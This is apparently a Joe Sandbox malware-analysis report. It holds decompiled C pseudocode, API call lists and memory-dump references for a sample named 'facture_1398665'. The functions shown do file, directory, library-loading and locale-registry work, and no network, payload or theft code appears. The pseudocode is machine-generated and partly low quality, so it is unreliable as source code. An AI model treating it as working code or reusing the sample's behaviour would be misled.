    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 68%
    			E00411A14(void* __eax, signed int __ebx, void* __edi, void* __esi, void* __fp0) {
    				signed char _t69;
    				void* _t94;
    				void* _t96;
    
    				_t94 = __edi;
    				_t69 = __ebx >> 1;
    				_push(__esi);
    				 *((intOrPtr*)(_t96 + 0x50)) =  *((intOrPtr*)(_t96 + 0x50)) + __esi;
    			}






    0x00411a14
    0x00411a14
    0x00411a16
    0x00411a1d

    APIs
    • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 00411A57
      • Part of subcall function 004030BC: QueryPerformanceCounter.KERNEL32 ref: 004030C0
      • Part of subcall function 004030BC: GetTickCount.KERNEL32 ref: 004030D4
      • Part of subcall function 0040E414: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E45C
      • Part of subcall function 0040E414: GetLastError.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E465
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 60%
    			E0040E168(void* __eax, void* __edx, void* __eflags) {
    				int _v8;
    				char _v16;
    				long _v20;
    				int _t13;
    				intOrPtr _t27;
    				void* _t32;
    				void* _t34;
    				intOrPtr _t35;
    
    				_t32 = _t34;
    				_t35 = _t34 + 0xfffffff0;
    				if(E0040E11C(__eax,  &_v16) != 0) {
    					_push(_t32);
    					_push(0x40e1c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t35;
    					_t13 = DeleteFileW(E00404D24(__edx)); // executed
    					_v8 = _t13;
    					_v20 = GetLastError();
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(E0040E1CC);
    					return E0040E158( &_v16);
    				} else {
    					_v8 = 0;
    					return _v8;
    				}
    			}











    0x0040e169
    0x0040e16b
    0x0040e180
    0x0040e18b
    0x0040e18c
    0x0040e191
    0x0040e194
    0x0040e19f
    0x0040e1a4
    0x0040e1ac
    0x0040e1b1
    0x0040e1b4
    0x0040e1b7
    0x0040e1c4
    0x0040e182
    0x0040e184
    0x0040e1dd
    0x0040e1dd

    APIs
      • Part of subcall function 0040E11C: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,0040E1F6,00000000,00000000), ref: 0040E137
      • Part of subcall function 0040E11C: SetLastError.KERNEL32(00000001,00000000,0040E1F6,00000000,00000000), ref: 0040E14E
    • DeleteFileW.KERNEL32(00000000,00000000,0040E1C5,?,0000000D,00000000), ref: 0040E19F
    • GetLastError.KERNEL32(00000000,00000000,0040E1C5,?,0000000D,00000000), ref: 0040E1A7
      • Part of subcall function 0040E158: Wow64RevertWow64FsRedirection.KERNEL32(?,0040E235,0040E23D,00000000,00000000), ref: 0040E161
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 37%
    			E0040AC82(void* __eax, void* __ebx, int __edx) {
    				struct HINSTANCE__* _v12;
    				int _v16;
    				int _t4;
    				struct HINSTANCE__* _t9;
    				void* _t12;
    				intOrPtr _t16;
    				void* _t18;
    				void* _t19;
    				intOrPtr _t20;
    
    				_t18 = _t19;
    				_t20 = _t19 + 0xfffffff4;
    				_t12 = __eax;
    				_t4 = SetErrorMode(__edx); // executed
    				_v16 = _t4;
    				_push(_t18);
    				_push(0x40acf6);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				asm("fnstcw word [ebp-0x2]");
    				_push(_t18);
    				_push(0x40acd8);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				_t9 = LoadLibraryW(E00404D24(_t12)); // executed
    				_v12 = _t9;
    				_pop(_t16);
    				 *[fs:eax] = _t16;
    				_push(E0040ACDF);
    				asm("fclex");
    				asm("fldcw word [ebp-0x2]");
    				return 0;
    			}












    0x0040ac85
    0x0040ac87
    0x0040ac8b
    0x0040ac8e
    0x0040ac93
    0x0040ac98
    0x0040ac99
    0x0040ac9e
    0x0040aca1
    0x0040aca4
    0x0040aca9
    0x0040acaa
    0x0040acaf
    0x0040acb2
    0x0040acbd
    0x0040acc2
    0x0040acc7
    0x0040acca
    0x0040accd
    0x0040acd2
    0x0040acd4
    0x0040acd7

    APIs
    • SetErrorMode.KERNEL32 ref: 0040AC8E
    • LoadLibraryW.KERNEL32(00000000), ref: 0040ACBD
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E00411E2B(void* __edx) {
    				intOrPtr _t1;
    				int _t2;
    				intOrPtr _t3;
    				intOrPtr _t5;
    				struct HWND__* _t8;
    				intOrPtr _t9;
    				intOrPtr _t12;
    				intOrPtr _t15;
    				intOrPtr _t16;
    
    				_t1 =  *0x41865c; // 0x1240ef8
    				_t2 = E00403894(_t1);
    				if( *0x418670 != 0) {
    					_t16 =  *0x418670; // 0x122172c
    					_t2 = E0040E5DC(0, _t16, 0xfa, 0x32); // executed
    				}
    				if( *0x418668 != 0) {
    					_t9 =  *0x418668; // 0x11f6b0c
    					_t2 = RemoveDirectoryW(E00404D24(_t9)); // executed
    				}
    				if( *0x412af0 != 0) {
    					_t8 =  *0x412af0; // 0x0
    					_t2 = DestroyWindow(_t8); // executed
    				}
    				if( *0x41864c != 0) {
    					_t3 =  *0x41864c; // 0x125da98
    					_t12 =  *0x418650; // 0x1
    					_t15 =  *0x40dcc4; // 0x40dcc8
    					E00405548(_t3, _t12, _t15);
    					_t5 =  *0x41864c; // 0x125da98
    					E00402E20(_t5);
    					 *0x41864c = 0;
    					return 0;
    				}
    				return _t2;
    			}












    0x00411d9c
    0x00411da1
    0x00411dad
    0x00411dbb
    0x00411dc3
    0x00411dc3
    0x00411dcf
    0x00411dd1
    0x00411ddc
    0x00411ddc
    0x00411de8
    0x00411dea
    0x00411df0
    0x00411df0
    0x00411dfc
    0x00411dfe
    0x00411e03
    0x00411e09
    0x00411e0f
    0x00411e14
    0x00411e19
    0x00411e20
    0x00000000
    0x00411e20
    0x00411e25

    APIs
    • RemoveDirectoryW.KERNEL32(00000000,00411E30,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411DDC
    • DestroyWindow.USER32(00000000), ref: 00411DF0
      • Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E5FB
      • Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E60B
      • Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E61E
      • Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E628
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 37%
    			E0040AC84(void* __eax, void* __ebx, int __edx) {
    				struct HINSTANCE__* _v12;
    				int _v16;
    				int _t4;
    				struct HINSTANCE__* _t9;
    				void* _t12;
    				intOrPtr _t16;
    				void* _t18;
    				void* _t19;
    				intOrPtr _t20;
    
    				_t18 = _t19;
    				_t20 = _t19 + 0xfffffff4;
    				_t12 = __eax;
    				_t4 = SetErrorMode(__edx); // executed
    				_v16 = _t4;
    				_push(_t18);
    				_push(0x40acf6);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				asm("fnstcw word [ebp-0x2]");
    				_push(_t18);
    				_push(0x40acd8);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				_t9 = LoadLibraryW(E00404D24(_t12)); // executed
    				_v12 = _t9;
    				_pop(_t16);
    				 *[fs:eax] = _t16;
    				_push(E0040ACDF);
    				asm("fclex");
    				asm("fldcw word [ebp-0x2]");
    				return 0;
    			}












    0x0040ac85
    0x0040ac87
    0x0040ac8b
    0x0040ac8e
    0x0040ac93
    0x0040ac98
    0x0040ac99
    0x0040ac9e
    0x0040aca1
    0x0040aca4
    0x0040aca9
    0x0040acaa
    0x0040acaf
    0x0040acb2
    0x0040acbd
    0x0040acc2
    0x0040acc7
    0x0040acca
    0x0040accd
    0x0040acd2
    0x0040acd4
    0x0040acd7

    APIs
    • SetErrorMode.KERNEL32 ref: 0040AC8E
    • LoadLibraryW.KERNEL32(00000000), ref: 0040ACBD
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 79%
    			E0040C390(intOrPtr* __eax, long __ecx, void* __edx) {
    				long _v16;
    				int _t7;
    				intOrPtr* _t12;
    
    				_push(__ecx);
    				_t12 = __eax;
    				_t7 = ReadFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
    				if(_t7 == 0 && ( *((char*)(_t12 + 8)) != 0 || GetLastError() != 0x6d)) {
    					E0040C1E4( *_t12);
    				}
    				return _v16;
    			}






    0x0040c393
    0x0040c398
    0x0040c3a7
    0x0040c3ae
    0x0040c3c2
    0x0040c3c2
    0x0040c3ce

    APIs
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040C3A7
    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0040C3B6
      • Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,012326AC,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 72%
    			E0040C3D0(intOrPtr* __eax, void* __edx) {
    				long _v16;
    				long _v20;
    				long _t8;
    				intOrPtr* _t10;
    
    				asm("movsd");
    				asm("movsd");
    				_t10 = __eax;
    				_t8 = SetFilePointer( *(__eax + 4), _v20,  &_v16, 0); // executed
    				if(_t8 == 0xffffffff) {
    					_t8 = GetLastError();
    					if(_t8 != 0) {
    						_t8 = E0040C1E4( *_t10);
    					}
    				}
    				return _t8;
    			}







    0x0040c3db
    0x0040c3dc
    0x0040c3dd
    0x0040c3ef
    0x0040c3f7
    0x0040c3f9
    0x0040c400
    0x0040c404
    0x0040c404
    0x0040c400
    0x0040c40e

    APIs
    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040C3EF
    • GetLastError.KERNEL32(?,?,?,00000000), ref: 0040C3F9
      • Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,012326AC,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040C328(intOrPtr* __eax, long* __edx) {
    				long _t8;
    				long* _t11;
    				intOrPtr* _t13;
    
    				_t11 = __edx;
    				_t13 = __eax;
    				 *(__edx + 4) = 0;
    				_t8 = SetFilePointer( *(__eax + 4), 0, __edx + 4, 1); // executed
    				 *_t11 = _t8;
    				if( *_t11 == 0xffffffff) {
    					_t8 = GetLastError();
    					if(_t8 != 0) {
    						return E0040C1E4( *_t13);
    					}
    				}
    				return _t8;
    			}






    0x0040c32a
    0x0040c32c
    0x0040c330
    0x0040c33f
    0x0040c344
    0x0040c349
    0x0040c34b
    0x0040c352
    0x00000000
    0x0040c356
    0x0040c352
    0x0040c35d

    APIs
    • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040C33F
    • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 0040C34B
      • Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,012326AC,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 85%
    			E004063E4(void* __eax, void* __edx, intOrPtr* _a4084) {
    				short _v4104;
    				void* _t7;
    				intOrPtr* _t8;
    				int _t15;
    				intOrPtr* _t17;
    				void* _t23;
    				void* _t24;
    
    				_push(__eax);
    				_t7 = 2;
    				do {
    					_t23 = _t23 + 0xfffff004;
    					_push(_t7);
    					_t7 = _t7 - 1;
    				} while (_t7 != 0);
    				_t8 = _a4084;
    				_t24 = _t23 + 4;
    				_t22 = __edx;
    				_t17 = _t8;
    				if(_t17 != 0) {
    					_t28 =  *(_t17 + 4) - 0x10000;
    					if( *(_t17 + 4) >= 0x10000) {
    						_t8 = E00404E14(__edx,  *(_t17 + 4));
    					} else {
    						_t15 = LoadStringW(E00405B90( *((intOrPtr*)( *_t17))),  *(_t17 + 4),  &_v4104, 0x1000); // executed
    						_t8 = E00404DD4(_t22, _t15, _t24, _t28);
    					}
    				}
    				return _t8;
    			}










    0x004063e6
    0x004063e7
    0x004063ec
    0x004063ec
    0x004063f2
    0x004063f3
    0x004063f3
    0x004063f6
    0x004063fd
    0x00406400
    0x00406402
    0x00406406
    0x00406408
    0x0040640f
    0x00406440
    0x00406411
    0x00406429
    0x00406434
    0x00406434
    0x0040640f
    0x0040644d

    APIs
    • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00406429
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 86%
    			E0040C42C(intOrPtr* __eax, long __ecx, void* __edx, void* __ebp) {
    				long _v16;
    				void* __ebx;
    				int _t6;
    				intOrPtr* _t9;
    				long _t15;
    
    				_push(__ecx);
    				_t15 = __ecx;
    				_t9 = __eax;
    				_t6 = WriteFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
    				if(_t6 == 0) {
    					_t6 = E0040C1E4( *_t9);
    				}
    				if(_t15 != _v16) {
    					_t6 = E0040C130(_t9, 0x1d);
    				}
    				return _t6;
    			}








    0x0040c42f
    0x0040c430
    0x0040c434
    0x0040c443
    0x0040c44a
    0x0040c44e
    0x0040c44e
    0x0040c456
    0x0040c45f
    0x0040c45f
    0x0040c468

    APIs
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040C443
      • Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,012326AC,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040BF84(long __eax, void* __edx) {
    				short _v2052;
    				signed int _t7;
    				void* _t10;
    				signed int _t16;
    				void* _t17;
    
    				_t10 = __edx;
    				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
    				while(_t7 > 0) {
    					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
    					if(_t16 <= 0x20) {
    						L1:
    						_t7 = _t7 - 1;
    						__eflags = _t7;
    						continue;
    					} else {
    						_t20 = _t16 - 0x2e;
    						if(_t16 == 0x2e) {
    							goto L1;
    						}
    					}
    					break;
    				}
    				return E00404DD4(_t10, _t7, _t17, _t20);
    			}








    0x0040bf8b
    0x0040bfa3
    0x0040bfab
    0x0040bfaf
    0x0040bfb8
    0x0040bfaa
    0x0040bfaa
    0x0040bfaa
    0x00000000
    0x0040bfba
    0x0040bfba
    0x0040bfbe
    0x00000000
    0x00000000
    0x0040bfbe
    0x00000000
    0x0040bfb8
    0x0040bfd1

    APIs
    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,0040C156,00000000,0040C1A7,?,0040C360), ref: 0040BFA3
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 31%
    			E0040B698(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
    				char _v8;
    				intOrPtr _t21;
    				intOrPtr _t24;
    
    				_push(0);
    				_push(_t24);
    				_push(0x40b6de);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				E0040B62C(__eax, __ecx,  &_v8, __eflags);
    				GetFileAttributesW(E00404D24(_v8)); // executed
    				_pop(_t21);
    				 *[fs:eax] = _t21;
    				_push(E0040B6E5);
    				return L00404C88( &_v8);
    			}






    0x0040b69b
    0x0040b6a2
    0x0040b6a3
    0x0040b6a8
    0x0040b6ab
    0x0040b6b3
    0x0040b6c1
    0x0040b6ca
    0x0040b6cd
    0x0040b6d0
    0x0040b6dd

    APIs
    • GetFileAttributesW.KERNEL32(00000000,00000000,0040B6DE,?,?,00000000,?,0040B6F1,0040BA6E,00000000,0040BAB3,?,?,00000000,00000000), ref: 0040B6C1
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E00405B48(void* __eax) {
    				short _v532;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				WCHAR* _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					_t3 = _t16 + 4; // 0x400000
    					GetModuleFileNameW( *_t3,  &_v532, 0x20a);
    					_t14 = E00405DE8(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						_t5 = _t16 + 4; // 0x400000
    						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
    					}
    				}
    				_t7 = _t16 + 0x10; // 0x400000
    				return  *_t7;
    			}








    0x00405b50
    0x00405b56
    0x00405b62
    0x00405b66
    0x00405b6f
    0x00405b74
    0x00405b76
    0x00405b7b
    0x00405b7d
    0x00405b80
    0x00405b80
    0x00405b7b
    0x00405b83
    0x00405b8e

    APIs
    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 00405B66
      • Part of subcall function 00405DE8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00400000,004127B4), ref: 00405E04
      • Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,004127B4), ref: 00405E24
      • Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,004127B4), ref: 00405E42
      • Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 00405E60
      • Part of subcall function 00405DE8: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00405E7E
      • Part of subcall function 00405DE8: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 00405EC7
      • Part of subcall function 00405DE8: RegQueryValueExW.ADVAPI32(?,00406110,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001), ref: 00405EE5
      • Part of subcall function 00405DE8: RegCloseKey.ADVAPI32(?,00405F23,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F16
      • Part of subcall function 00405DE8: lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 00405F33
      • Part of subcall function 00405DE8: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405F40
      • Part of subcall function 00405DE8: GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405F46
      • Part of subcall function 00405DE8: lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F74
      • Part of subcall function 00405DE8: lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405FCA
      • Part of subcall function 00405DE8: LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405FDA
      • Part of subcall function 00405DE8: lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040600A
      • Part of subcall function 00405DE8: LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040601A
      • Part of subcall function 00405DE8: lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406049
      • Part of subcall function 00405DE8: LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 00406059
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040C2E0(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
    				void* _t17;
    
    				_t17 = CreateFileW(E00404D24(__edx),  *(0x4129dc + (_a8 & 0x000000ff) * 4),  *(0x4129e8 + (_a4 & 0x000000ff) * 4), 0,  *(0x4129f8 + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
    				return _t17;
    			}




    0x0040c31d
    0x0040c325

    APIs
    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0040C31D
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040C410(intOrPtr* __eax) {
    				int _t4;
    				intOrPtr* _t7;
    
    				_t7 = __eax;
    				_t4 = SetEndOfFile( *(__eax + 4)); // executed
    				if(_t4 == 0) {
    					return E0040C1E4( *_t7);
    				}
    				return _t4;
    			}





    0x0040c411
    0x0040c417
    0x0040c41e
    0x00000000
    0x0040c422
    0x0040c428

    APIs
    • SetEndOfFile.KERNEL32(?,7FE80010,00411C36,00000000), ref: 0040C417
      • Part of subcall function 0040C1E4: GetLastError.KERNEL32(0040C0A4,0040C287,?,?,012326AC,?,0041187B,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040C1E7
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 50%
    			E0040ACDF() {
    				int _t4;
    				intOrPtr _t7;
    				void* _t8;
    
    				_pop(_t7);
    				 *[fs:eax] = _t7;
    				_push(E0040ACFD);
    				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
    				return _t4;
    			}






    0x0040ace1
    0x0040ace4
    0x0040ace7
    0x0040acf0
    0x0040acf5

    APIs
    • SetErrorMode.KERNEL32(?,0040ACFD), ref: 0040ACF0
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
